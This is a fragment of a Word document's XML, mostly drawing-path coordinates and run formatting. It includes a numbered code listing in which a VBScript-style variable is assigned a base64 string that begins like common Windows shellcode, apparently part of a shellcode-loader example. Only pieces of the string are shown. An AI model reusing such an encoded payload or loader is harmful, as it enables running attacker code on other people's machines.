2543,13937,2543,13935,2543,13934,2543,13933,2543,13932,2543,13931,2543,13930,2543,13928,2543,13927,2543,13926,2543,13924,2543,13923,2543,13921,2543,13920,2543,13918,2543,13916,2543,13915,2543,13913,2543,13911,2543,13909,2543,13907,2543,13905,2543,13903,2543,13901,2543,13899,2543,13896,2543,13894,2543,13892,2543,13889,2543,13887,2543,13884,2543,13882,2543,13879,2543,13876,2543,13874,2543,13871,2543,13868,2543,13865,2543,13862,2543,13858,2543,13855,2543,13852,2543,13849,2543,13845,2543,13842,2543,13838,2543,13834,2543,13831,2543,13827,2543,13823,2543,13819,2543,13815,2543,13811,2543,13807,2543,13802,2543,13798,2543,13794,2543,13789,2543,13784,2543,13780,2543,13775,2543,13770,2543,13765,2543,13760,2543,13755,2543,13750,2543,13744,2543,13739,2543,13733e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:713.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,14270" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:14270;width:110;height:230" coordorigin="2110,14270" coordsize="110,230" path="m2128,14291l2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2128,14291,2129,14291,2129,14291,2129,14291,2129,14291,2129,14291,2129,14291,2129,14291,2129,14291,2130,14291,2130,14291,2130,14291,2130,14291,2131,14291,2131,14291,2131,14291,2131,14291,2132,14291,2132,14291,2132,14291,2133,14291,2133,14291,2133,14291,2134,14291,2134,14291,2134,14291,2135,14291,2135,14291,2136,14291,2136,14291,2137,14291,2137,14291,2138,14291,2138,14291,2139,14291,2140,14291,2140,14291,2141,14291,2142,14291,2142,14291,2143,14291,2144,14291,2145,14291,2145,14291,2146,14291,2147,14291,2148,14291,2149,14291,2150,14291,2151,14291,2152,14291,2153,14291,2154,14291,2155,14291,2156,14291,2157,14291,2158,14291,2159,14291,2160,14291,2162,14291,2163,14291,2164,14291,2165,14291,2167,14291,2168,14291,2170,14291,2171,14291,2173,14291,2174,14291,2176,14291,2177,14291,2179,14291,2180,14291,2182,14291,2184,14291,2186,14291,2187,14291,2189,14291,2191,14291,2193,14291,2195,14291,2197,14291,2199,14291,2201,14291,2203,14291,2205,14291,2207,14291,2210,14291,2212,14291,2214,14291,2216,14291,2219,14291,2221,14291,2224,14291,2226,14291,2229,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14291,2231,14292,2231,14292,2231,14292,2231,14292,2231,14292,2231,14292,2231,14292,2231,14293,2231,14293,2231,14293,2231,14293,2231,14294,2231,14294,2231,14294,2231,14295,2231,14295,2231,14295,2231,14296,2231,14296,2231,14297,2231,14297,2231,14298,2231,14298,2231,14299,2231,14299,2231,14300,2231,14301,2231,14301,2231,14302,2231,14303,2231,14304,2231,14305,2231,14305,2231,14306,2231,14307,2231,14308,2231,14309,2231,14310,2231,14312,2231,14313,2231,14314,2231,14315,2231,14317,2231,14318,2231,14319,2231,14321,2231,14322,2231,14324,2231,14325,2231,14327,2231,14329,2231,14330,2231,14332,2231,14334,2231,14336,2231,14338,2231,14340,2231,14342,2231,14344,2231,14346,2231,14348,2231,14351,2231,14353,2231,14356,2231,14358,2231,14361,2231,14363,2231,14366,2231,14369,2231,14371,2231,14374,2231,14377,2231,14380,2231,14383,2231,14386,2231,14390,2231,14393,2231,14396,2231,14400,2231,14403,2231,14407,2231,14410,2231,14414,2231,14418,2231,14422,2231,14426,2231,14430,2231,14434,2231,14438,2231,14442,2231,14447,2231,14451,2231,14456,2231,14460,2231,14465,2231,14470,2231,14475,2231,14480,2231,14485,2231,14490,2231,14495,2231,14501,2231,14506,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2231,14511,2230,14511,2230,14511,2230,14511,2230,14511,2230,14511,2230,14511,2230,14511,2229,14511,2229,14511,2229,14511,2229,14511,2229,14511,2228,14511,2228,14511,2228,14511,2227,14511,2227,14511,2227,14511,2227,14511,2226,14511,2226,14511,2225,14511,2225,14511,2225,14511,2224,14511,2224,14511,2223,14511,2223,14511,2222,14511,2222,14511,2221,14511,2221,14511,2220,14511,2219,14511,2219,14511,2218,14511,2217,14511,2217,14511,2216,14511,2215,14511,2214,14511,2214,14511,2213,14511,2212,14511,2211,14511,2210,14511,2209,14511,2208,14511,2207,14511,2206,14511,2205,14511,2204,14511,2203,14511,2202,14511,2201,14511,2200,14511,2199,14511,2197,14511,2196,14511,2195,14511,2194,14511,2192,14511,2191,14511,2189,14511,2188,14511,2187,14511,2185,14511,2183,14511,2182,14511,2180,14511,2179,14511,2177,14511,2175,14511,2173,14511,2172,14511,2170,14511,2168,14511,2166,14511,2164,14511,2162,14511,2160,14511,2158,14511,2156,14511,2154,14511,2152,14511,2149,14511,2147,14511,2145,14511,2143,14511,2140,14511,2138,14511,2135,14511,2133,14511,2130,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14511,2128,14510,2128,14510,2128,14510,2128,14510,2128,14510,2128,14509,2128,14509,2128,14509,2128,14509,2128,14508,2128,14508,2128,14508,2128,14507,2128,14507,2128,14506,2128,14506,2128,14505,2128,14505,2128,14504,2128,14504,2128,14503,2128,14502,2128,14502,2128,14501,2128,14500,2128,14500,2128,14499,2128,14498,2128,14497,2128,14496,2128,14495,2128,14494,2128,14493,2128,14492,2128,14491,2128,14490,2128,14488,2128,14487,2128,14486,2128,14485,2128,14483,2128,14482,2128,14480,2128,14479,2128,14477,2128,14476,2128,14474,2128,14472,2128,14470,2128,14468,2128,14467,2128,14465,2128,14463,2128,14461,2128,14458,2128,14456,2128,14454,2128,14452,2128,14449,2128,14447,2128,14444,2128,14442,2128,14439,2128,14437,2128,14434,2128,14431,2128,14428,2128,14425,2128,14422,2128,14419,2128,14416,2128,14413,2128,14410,2128,14406,2128,14403,2128,14399,2128,14396,2128,14392,2128,14388,2128,14385,2128,14381,2128,14377,2128,14373,2128,14369,2128,14364,2128,14360,2128,14356,2128,14351,2128,14347,2128,14342,2128,14337,2128,14333,2128,14328,2128,14323,2128,14318,2128,14312,2128,14307,2128,14302,2128,14297,2128,14291e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:713.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,14270" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:14270;width:110;height:230" coordorigin="2530,14270" coordsize="110,230" path="m2543,14291l2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2543,14291,2544,14291,2544,14291,2544,14291,2544,14291,2544,14291,2544,14291,2544,14291,2545,14291,2545,14291,2545,14291,2545,14291,2545,14291,2546,14291,2546,14291,2546,14291,2547,14291,2547,14291,2547,14291,2548,14291,2548,14291,2548,14291,2549,14291,2549,14291,2549,14291,2550,14291,2550,14291,2551,14291,2551,14291,2552,14291,2552,14291,2553,14291,2553,14291,2554,14291,2555,14291,2555,14291,2556,14291,2557,14291,2557,14291,2558,14291,2559,14291,2560,14291,2560,14291,2561,14291,2562,14291,2563,14291,2564,14291,2565,14291,2566,14291,2567,14291,2568,14291,2569,14291,2570,14291,2571,14291,2572,14291,2573,14291,2574,14291,2575,14291,2577,14291,2578,14291,2579,14291,2580,14291,2582,14291,2583,14291,2585,14291,2586,14291,2587,14291,2589,14291,2591,14291,2592,14291,2594,14291,2595,14291,2597,14291,2599,14291,2601,14291,2602,14291,2604,14291,2606,14291,2608,14291,2610,14291,2612,14291,2614,14291,2616,14291,2618,14291,2620,14291,2622,14291,2625,14291,2627,14291,2629,14291,2631,14291,2634,14291,2636,14291,2639,14291,2641,14291,2644,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14291,2646,14292,2646,14292,2646,14292,2646,14292,2646,14292,2646,14292,2646,14292,2646,14293,2646,14293,2646,14293,2646,14293,2646,14294,2646,14294,2646,14294,2646,14295,2646,14295,2646,14295,2646,14296,2646,14296,2646,14297,2646,14297,2646,14298,2646,14298,2646,14299,2646,14299,2646,14300,2646,14301,2646,14301,2646,14302,2646,14303,2646,14304,2646,14305,2646,14305,2646,14306,2646,14307,2646,14308,2646,14309,2646,14310,2646,14312,2646,14313,2646,14314,2646,14315,2646,14317,2646,14318,2646,14319,2646,14321,2646,14322,2646,14324,2646,14325,2646,14327,2646,14329,2646,14330,2646,14332,2646,14334,2646,14336,2646,14338,2646,14340,2646,14342,2646,14344,2646,14346,2646,14348,2646,14351,2646,14353,2646,14356,2646,14358,2646,14361,2646,14363,2646,14366,2646,14369,2646,14371,2646,14374,2646,14377,2646,14380,2646,14383,2646,14386,2646,14390,2646,14393,2646,14396,2646,14400,2646,14403,2646,14407,2646,14410,2646,14414,2646,14418,2646,14422,2646,14426,2646,14430,2646,14434,2646,14438,2646,14442,2646,14447,2646,14451,2646,14456,2646,14460,2646,14465,2646,14470,2646,14475,2646,14480,2646,14485,2646,14490,2646,14495,2646,14501,2646,14506,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2646,14511,2645,14511,2645,14511,2645,14511,2645,14511,2645,14511,2645,14511,2645,14511,2644,14511,2644,14511,2644,14511,2644,14511,2643,14511,2643,14511,2643,14511,2643,14511,2642,14511,2642,14511,2642,14511,2641,14511,2641,14511,2641,14511,2640,14511,2640,14511,2640,14511,2639,14511,2639,14511,2638,14511,2638,14511,2637,14511,2637,14511,2636,14511,2636,14511,2635,14511,2634,14511,2634,14511,2633,14511,2632,14511,2632,14511,2631,14511,2630,14511,2629,14511,2629,14511,2628,14511,2627,14511,2626,14511,2625,14511,2624,14511,2623,14511,2622,14511,2621,14511,2620,14511,2619,14511,2618,14511,2617,14511,2616,14511,2615,14511,2614,14511,2612,14511,2611,14511,2610,14511,2609,14511,2607,14511,2606,14511,2604,14511,2603,14511,2601,14511,2600,14511,2598,14511,2597,14511,2595,14511,2594,14511,2592,14511,2590,14511,2588,14511,2587,14511,2585,14511,2583,14511,2581,14511,2579,14511,2577,14511,2575,14511,2573,14511,2571,14511,2569,14511,2567,14511,2564,14511,2562,14511,2560,14511,2558,14511,2555,14511,2553,14511,2550,14511,2548,14511,2545,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14511,2543,14510,2543,14510,2543,14510,2543,14510,2543,14510,2543,14509,2543,14509,2543,14509,2543,14509,2543,14508,2543,14508,2543,14508,2543,14507,2543,14507,2543,14506,2543,14506,2543,14505,2543,14505,2543,14504,2543,14504,2543,14503,2543,14502,2543,14502,2543,14501,2543,14500,2543,14500,2543,14499,2543,14498,2543,14497,2543,14496,2543,14495,2543,14494,2543,14493,2543,14492,2543,14491,2543,14490,2543,14488,2543,14487,2543,14486,2543,14485,2543,14483,2543,14482,2543,14480,2543,14479,2543,14477,2543,14476,2543,14474,2543,14472,2543,14470,2543,14468,2543,14467,2543,14465,2543,14463,2543,14461,2543,14458,2543,14456,2543,14454,2543,14452,2543,14449,2543,14447,2543,14444,2543,14442,2543,14439,2543,14437,2543,14434,2543,14431,2543,14428,2543,14425,2543,14422,2543,14419,2543,14416,2543,14413,2543,14410,2543,14406,2543,14403,2543,14399,2543,14396,2543,14392,2543,14388,2543,14385,2543,14381,2543,14377,2543,14373,2543,14369,2543,14364,2543,14360,2543,14356,2543,14351,2543,14347,2543,14342,2543,14337,2543,14333,2543,14328,2543,14323,2543,14318,2543,14312,2543,14307,2543,14302,2543,14297,2543,14291e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:14810;width:110;height:230" coordorigin="2110,14810" coordsize="110,230" path="m2128,14836l2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2128,14836,2129,14836,2129,14836,2129,14836,2129,14836,2129,14836,2129,14836,2129,14836,2129,14836,2130,14836,2130,14836,2130,14836,2130,14836,2131,14836,2131,14836,2131,14836,2131,14836,2132,14836,2132,14836,2132,14836,2133,14836,2133,14836,2133,14836,2134,14836,2134,14836,2134,14836,2135,14836,2135,14836,2136,14836,2136,14836,2137,14836,2137,14836,2138,14836,2138,14836,2139,14836,2140,14836,2140,14836,2141,14836,2142,14836,2142,14836,2143,14836,2144,14836,2145,14836,2145,14836,2146,14836,2147,14836,2148,14836,2149,14836,2150,14836,2151,14836,2152,14836,2153,14836,2154,14836,2155,14836,2156,14836,2157,14836,2158,14836,2159,14836,2160,14836,2162,14836,2163,14836,2164,14836,2165,14836,2167,14836,2168,14836,2170,14836,2171,14836,2173,14836,2174,14836,2176,14836,2177,14836,2179,14836,2180,14836,2182,14836,2184,14836,2186,14836,2187,14836,2189,14836,2191,14836,2193,14836,2195,14836,2197,14836,2199,14836,2201,14836,2203,14836,2205,14836,2207,14836,2210,14836,2212,14836,2214,14836,2216,14836,2219,14836,2221,14836,2224,14836,2226,14836,2229,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14836,2231,14837,2231,14837,2231,14837,2231,14837,2231,14837,2231,14837,2231,14838,2231,14838,2231,14838,2231,14839,2231,14839,2231,14839,2231,14840,2231,14840,2231,14840,2231,14841,2231,14841,2231,14842,2231,14842,2231,14843,2231,14843,2231,14844,2231,14845,2231,14845,2231,14846,2231,14847,2231,14848,2231,14848,2231,14849,2231,14850,2231,14851,2231,14852,2231,14853,2231,14854,2231,14855,2231,14856,2231,14857,2231,14859,2231,14860,2231,14861,2231,14862,2231,14864,2231,14865,2231,14867,2231,14868,2231,14870,2231,14872,2231,14873,2231,14875,2231,14877,2231,14879,2231,14881,2231,14882,2231,14884,2231,14887,2231,14889,2231,14891,2231,14893,2231,14895,2231,14898,2231,14900,2231,14903,2231,14905,2231,14908,2231,14910,2231,14913,2231,14916,2231,14919,2231,14922,2231,14925,2231,14928,2231,14931,2231,14934,2231,14937,2231,14941,2231,14944,2231,14948,2231,14951,2231,14955,2231,14959,2231,14963,2231,14966,2231,14970,2231,14974,2231,14979,2231,14983,2231,14987,2231,14991,2231,14996,2231,15000,2231,15005,2231,15010,2231,15015,2231,15019,2231,15024,2231,15029,2231,15035,2231,15040,2231,15045,2231,15051,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2231,15056,2230,15056,2230,15056,2230,15056,2230,15056,2230,15056,2230,15056,2230,15056,2229,15056,2229,15056,2229,15056,2229,15056,2229,15056,2228,15056,2228,15056,2228,15056,2227,15056,2227,15056,2227,15056,2227,15056,2226,15056,2226,15056,2225,15056,2225,15056,2225,15056,2224,15056,2224,15056,2223,15056,2223,15056,2222,15056,2222,15056,2221,15056,2221,15056,2220,15056,2219,15056,2219,15056,2218,15056,2217,15056,2217,15056,2216,15056,2215,15056,2214,15056,2214,15056,2213,15056,2212,15056,2211,15056,2210,15056,2209,15056,2208,15056,2207,15056,2206,15056,2205,15056,2204,15056,2203,15056,2202,15056,2201,15056,2200,15056,2199,15056,2197,15056,2196,15056,2195,15056,2194,15056,2192,15056,2191,15056,2189,15056,2188,15056,2187,15056,2185,15056,2183,15056,2182,15056,2180,15056,2179,15056,2177,15056,2175,15056,2173,15056,2172,15056,2170,15056,2168,15056,2166,15056,2164,15056,2162,15056,2160,15056,2158,15056,2156,15056,2154,15056,2152,15056,2149,15056,2147,15056,2145,15056,2143,15056,2140,15056,2138,15056,2135,15056,2133,15056,2130,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15056,2128,15055,2128,15055,2128,15055,2128,15055,2128,15055,2128,15055,2128,15054,2128,15054,2128,15054,2128,15054,2128,15054,2128,15053,2128,15053,2128,15053,2128,15052,2128,15052,2128,15051,2128,15051,2128,15050,2128,15050,2128,15049,2128,15049,2128,15048,2128,15048,2128,15047,2128,15046,2128,15046,2128,15045,2128,15044,2128,15043,2128,15042,2128,15042,2128,15041,2128,15040,2128,15039,2128,15038,2128,15037,2128,15035,2128,15034,2128,15033,2128,15032,2128,15031,2128,15029,2128,15028,2128,15026,2128,15025,2128,15023,2128,15022,2128,15020,2128,15018,2128,15017,2128,15015,2128,15013,2128,15011,2128,15009,2128,15007,2128,15005,2128,15003,2128,15001,2128,14999,2128,14996,2128,14994,2128,14992,2128,14989,2128,14987,2128,14984,2128,14981,2128,14979,2128,14976,2128,14973,2128,14970,2128,14967,2128,14964,2128,14961,2128,14957,2128,14954,2128,14951,2128,14947,2128,14944,2128,14940,2128,14937,2128,14933,2128,14929,2128,14925,2128,14921,2128,14917,2128,14913,2128,14909,2128,14905,2128,14900,2128,14896,2128,14891,2128,14887,2128,14882,2128,14877,2128,14872,2128,14867,2128,14862,2128,14857,2128,14852,2128,14847,2128,14841,2128,14836e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:740.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,14810" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:14810;width:110;height:230" coordorigin="2530,14810" coordsize="110,230" path="m2543,14836l2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2543,14836,2544,14836,2544,14836,2544,14836,2544,14836,2544,14836,2544,14836,2544,14836,2545,14836,2545,14836,2545,14836,2545,14836,2545,14836,2546,14836,2546,14836,2546,14836,2547,14836,2547,14836,2547,14836,2548,14836,2548,14836,2548,14836,2549,14836,2549,14836,2549,14836,2550,14836,2550,14836,2551,14836,2551,14836,2552,14836,2552,14836,2553,14836,2553,14836,2554,14836,2555,14836,2555,14836,2556,14836,2557,14836,2557,14836,2558,14836,2559,14836,2560,14836,2560,14836,2561,14836,2562,14836,2563,14836,2564,14836,2565,14836,2566,14836,2567,14836,2568,14836,2569,14836,2570,14836,2571,14836,2572,14836,2573,14836,2574,14836,2575,14836,2577,14836,2578,14836,2579,14836,2580,14836,2582,14836,2583,14836,2585,14836,2586,14836,2587,14836,2589,14836,2591,14836,2592,14836,2594,14836,2595,14836,2597,14836,2599,14836,2601,14836,2602,14836,2604,14836,2606,14836,2608,14836,2610,14836,2612,14836,2614,14836,2616,14836,2618,14836,2620,14836,2622,14836,2625,14836,2627,14836,2629,14836,2631,14836,2634,14836,2636,14836,2639,14836,2641,14836,2644,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14836,2646,14837,2646,14837,2646,14837,2646,14837,2646,14837,2646,14837,2646,14838,2646,14838,2646,14838,2646,14839,2646,14839,2646,14839,2646,14840,2646,14840,2646,14840,2646,14841,2646,14841,2646,14842,2646,14842,2646,14843,2646,14843,2646,14844,2646,14845,2646,14845,2646,14846,2646,14847,2646,14848,2646,14848,2646,14849,2646,14850,2646,14851,2646,14852,2646,14853,2646,14854,2646,14855,2646,14856,2646,14857,2646,14859,2646,14860,2646,14861,2646,14862,2646,14864,2646,14865,2646,14867,2646,14868,2646,14870,2646,14872,2646,14873,2646,14875,2646,14877,2646,14879,2646,14881,2646,14882,2646,14884,2646,14887,2646,14889,2646,14891,2646,14893,2646,14895,2646,14898,2646,14900,2646,14903,2646,14905,2646,14908,2646,14910,2646,14913,2646,14916,2646,14919,2646,14922,2646,14925,2646,14928,2646,14931,2646,14934,2646,14937,2646,14941,2646,14944,2646,14948,2646,14951,2646,14955,2646,14959,2646,14963,2646,14966,2646,14970,2646,14974,2646,14979,2646,14983,2646,14987,2646,14991,2646,14996,2646,15000,2646,15005,2646,15010,2646,15015,2646,15019,2646,15024,2646,15029,2646,15035,2646,15040,2646,15045,2646,15051,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2646,15056,2645,15056,2645,15056,2645,15056,2645,15056,2645,15056,2645,15056,2645,15056,2644,15056,2644,15056,2644,15056,2644,15056,2643,15056,2643,15056,2643,15056,2643,15056,2642,15056,2642,15056,2642,15056,2641,15056,2641,15056,2641,15056,2640,15056,2640,15056,2640,15056,2639,15056,2639,15056,2638,15056,2638,15056,2637,15056,2637,15056,2636,15056,2636,15056,2635,15056,2634,15056,2634,15056,2633,15056,2632,15056,2632,15056,2631,15056,2630,15056,2629,15056,2629,15056,2628,15056,2627,15056,2626,15056,2625,15056,2624,15056,2623,15056,2622,15056,2621,15056,2620,15056,2619,15056,2618,15056,2617,15056,2616,15056,2615,15056,2614,15056,2612,15056,2611,15056,2610,15056,2609,15056,2607,15056,2606,15056,2604,15056,2603,15056,2601,15056,2600,15056,2598,15056,2597,15056,2595,15056,2594,15056,2592,15056,2590,15056,2588,15056,2587,15056,2585,15056,2583,15056,2581,15056,2579,15056,2577,15056,2575,15056,2573,15056,2571,15056,2569,15056,2567,15056,2564,15056,2562,15056,2560,15056,2558,15056,2555,15056,2553,15056,2550,15056,2548,15056,2545,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15056,2543,15055,2543,15055,2543,15055,2543,15055,2543,15055,2543,15055,2543,15054,2543,15054,2543,15054,2543,15054,2543,15054,2543,15053,2543,15053,2543,15053,2543,15052,2543,15052,2543,15051,2543,15051,2543,15050,2543,15050,2543,15049,2543,15049,2543,15048,2543,15048,2543,15047,2543,15046,2543,15046,2543,15045,2543,15044,2543,15043,2543,15042,2543,15042,2543,15041,2543,15040,2543,15039,2543,15038,2543,15037,2543,15035,2543,15034,2543,15033,2543,15032,2543,15031,2543,15029,2543,15028,2543,15026,2543,15025,2543,15023,2543,15022,2543,15020,2543,15018,2543,15017,2543,15015,2543,15013,2543,15011,2543,15009,2543,15007,2543,15005,2543,15003,2543,15001,2543,14999,2543,14996,2543,14994,2543,14992,2543,14989,2543,14987,2543,14984,2543,14981,2543,14979,2543,14976,2543,14973,2543,14970,2543,14967,2543,14964,2543,14961,2543,14957,2543,14954,2543,14951,2543,14947,2543,14944,2543,14940,2543,14937,2543,14933,2543,14929,2543,14925,2543,14921,2543,14917,2543,14913,2543,14909,2543,14905,2543,14900,2543,14896,2543,14891,2543,14887,2543,14882,2543,14877,2543,14872,2543,14867,2543,14862,2543,14857,2543,14852,2543,14847,2543,14841,2543,14836e x" fillcolor="#fefefe" stroke="f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68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65" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1281" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="10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Dim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="11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code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tS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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0Bxzjgd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fYDffg7fSR15FiLWCQB02aLDEuLWBwB04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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
